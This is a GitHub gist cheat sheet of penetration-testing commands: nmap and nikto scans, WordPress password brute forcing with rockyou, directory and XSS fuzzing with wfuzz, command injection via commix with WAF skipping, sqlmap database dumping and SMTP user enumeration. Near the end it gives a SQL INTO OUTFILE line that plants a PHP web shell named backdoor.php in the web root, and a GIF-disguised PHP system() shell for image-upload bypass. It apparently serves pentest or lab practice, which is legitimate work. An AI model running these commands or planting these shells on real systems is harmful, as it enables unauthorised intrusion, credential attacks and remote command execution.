Skip to content

Instantly share code, notes, and snippets.

@thevillagehacker

thevillagehacker/Notes.md

Last active May 20, 2024 03:13
Show Gist options
  • Save thevillagehacker/d74d3f8fbe30755838f556f7b1a9fd3b to your computer and use it in GitHub Desktop.
Save thevillagehacker/d74d3f8fbe30755838f556f7b1a9fd3b to your computer and use it in GitHub Desktop.
Download ZIP
Notes
Raw
Notes.md

COMMON COMMANDS

NMAP

nmap -p- -sT -sV -A $IP
nmap -p- -sC -sV $IP --open
nmap -p- --script=vuln $IP
nmap --script http-methods --script-args http-methods.url-path='/website' <target>
nmap -p80,443 --script=http-methods <ip> --script-args http-methods.url-path='/directory/goes/here'
nmap -p 139,445 -sC --script=smb-enum-shares <IP>

Sed IP's

grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' FILE

WPScan

wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u
wpscan --url $URL --disable-tls-checks -U users -P /usr/share/wordlists/rockyou.txt
wpscan --url $URL --enumerate p --plugins-detection aggressive

NIKTO

nikto --host $IP -ssl -evasion 1

DNSrecon

dnsrecon –d yourdomain.com

Gobuster

gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -l -k -t 30
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-files.txt -l -k -t 30
gobuster dns -d domain.org -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 30

Extract IPs from text file

grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' nmapfile.txt

Wfuzz

Wfuzz XSS Fuzzing

wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-BruteLogic.txt "$URL"
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-Jhaddix.txt "$URL"

COMMAND INJECTION WITH POST DATA

wfuzz -c -z file,/opt/SecLists/Fuzzing/command-injection-commix.txt -d "doi=FUZZ" "$URL"

Test for Paramter Existence!

wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt "$URL"

AUTHENTICATED FUZZING DIRECTORIES

wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 -d "SESSIONID=value" "$URL"

AUTHENTICATED FILE FUZZING:

wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-files.txt --hc 404 -d "SESSIONID=value" "$URL"

FUZZ Directories

wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"

FUZZ FILES

wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"

LARGE WORDS

wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-words.txt --hc 404 "$URL"

Users

wfuzz -c -z file,/opt/SecLists/Usernames/top-usernames-shortlist.txt --hc 404,403 "$URL"

Command Injection with commix, ssl, waf, random agent

commix --url="https://supermegaleetultradomain.com?parameter=" --level=3 --force-ssl --skip-waf --random-agent

SQLmap

sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force-ssl
sqlmap -u $URL --threads=2 --time-sec=10 --level=4 --risk=3 --dump

ThHarvester

theharvester -d domain.org -l 500 -b google

SMTP Enumeration

smtp-user-enum -M VRFY -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M RCPT -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP

TCP Monitor

tcpdump -i any -c5 icmp

Netdiscovery

netdiscover /r 0.0.0.0/24

INTO OUTFILE Door

SELECT<?php system($_GET[‘cmd’]); ?>” into outfile “/var/www/WEROOT/backdoor.php”;

LFI? => PHP Filter Checks

php://filter/convert.base64-encode/resource=

UPLOAD IMAGE?

"GIF89a1
<?php system($_POST[""cmd""]); ?>"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment